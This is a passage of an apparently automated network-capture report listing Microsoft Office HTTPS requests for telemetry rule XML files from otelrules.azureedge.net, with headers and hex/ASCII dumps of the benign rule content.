                                                                                                                          2024-10-13 16:21:32 UTC16384INData Raw: 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: T="B" /> </R> </O> </F> <F T="6"> <O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" />
                                                                                                                          2024-10-13 16:21:32 UTC16384INData Raw: 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                          Data Ascii: O> </F> <F T="6"> <O T="EQ"> <L> <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          17192.168.2.44978113.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:33 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:33 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:33 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 450
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                          ETag: "0x8DC582BD4C869AE"
                                                                                                                          x-ms-request-id: ced16f83-c01e-008e-1322-1b7381000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162133Z-17db6f7c8cfspvtq2pgqb2w5k000000004yg00000000d59w
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:33 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          18192.168.2.44978313.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:33 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:33 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:33 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 408
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                          ETag: "0x8DC582BB56D3AFB"
                                                                                                                          x-ms-request-id: 695c64e8-001e-0034-5de7-1add04000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162133Z-17db6f7c8cf5mtxmr1c51513n000000005c0000000005c3z
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:33 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          19192.168.2.44978013.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:33 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:33 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:33 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 3788
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                          ETag: "0x8DC582BAC2126A6"
                                                                                                                          x-ms-request-id: a65062bf-401e-00ac-0ea3-1b0a97000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162133Z-17db6f7c8cf6qp7g7r97wxgbqc00000004hg000000002hxq
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:33 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          20192.168.2.44978413.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:33 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:33 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:33 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 2160
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                          ETag: "0x8DC582BA3B95D81"
                                                                                                                          x-ms-request-id: b913ea27-a01e-0002-1718-1c5074000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162133Z-17db6f7c8cfqxt4wrzg7st2fm800000005ag000000001yvx
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:33 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          21192.168.2.44978213.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:33 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:33 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:33 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 2980
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                          ETag: "0x8DC582BA80D96A1"
                                                                                                                          x-ms-request-id: 3735e006-a01e-006f-3de4-1a13cd000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162133Z-17db6f7c8cfhzb2znbk0zyvf6n00000004q000000000g7b9
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:33 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          22192.168.2.44978613.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:34 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:34 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:34 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 415
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                          ETag: "0x8DC582B9F6F3512"
                                                                                                                          x-ms-request-id: 6c20420a-501e-008f-0947-1c9054000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162134Z-17db6f7c8cf9wwz8ehu7c5p33g00000002a000000000f32a
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:34 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          23192.168.2.44978713.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:34 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:34 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:34 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 471
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                          ETag: "0x8DC582BB10C598B"
                                                                                                                          x-ms-request-id: 52965a57-601e-000d-5970-1c2618000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162134Z-17db6f7c8cfmhggkx889x958tc000000027g00000000dv6u
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:34 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          24192.168.2.44978513.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:34 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:34 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:34 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 474
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                          ETag: "0x8DC582B9964B277"
                                                                                                                          x-ms-request-id: b1e48aa2-701e-0053-2fa3-1b3a0a000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162134Z-17db6f7c8cfq2j6f03aq9y8dns00000004b0000000007wd5
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:34 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          25192.168.2.44978813.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:34 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:34 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:34 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 632
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                          ETag: "0x8DC582BB6E3779E"
                                                                                                                          x-ms-request-id: e4dd17a3-501e-007b-21d7-1a5ba2000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162134Z-17db6f7c8cf4g2pjavqhm24vp4000000059000000000d3ws
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:34 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          26192.168.2.44978913.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:34 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:34 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:34 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 467
                                                                                                                          Connection: close
